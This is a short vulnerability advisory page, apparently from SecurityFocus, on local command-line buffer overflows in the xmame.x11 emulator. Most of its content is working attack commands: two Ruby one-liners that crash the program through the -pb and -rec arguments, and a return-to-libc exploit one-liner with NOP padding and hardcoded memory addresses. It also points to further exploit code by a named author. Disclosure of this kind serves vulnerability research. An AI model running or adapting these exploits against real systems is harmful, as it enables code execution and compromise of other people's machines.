XMame Multiple Local Command Line Argument Buffer Overflow Vulnerabilities

The following examples are sufficient to crash the application:
xmame.x11 -pb `ruby -e 'print "A" * 1034'`
xmame.x11 -rec `ruby -e 'print "A" * 1020'`

The following return-to-libc exploit is also available:
./xmame.x11 -pb `ruby -e 'print "\x90" * 1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'`

Exploit code by Rafael San Miguel Carrasco <smcsoc@yahoo.es> is also available (xmame_bf_exploit.txt).


 

Privacy Statement
Copyright 2010, SecurityFocus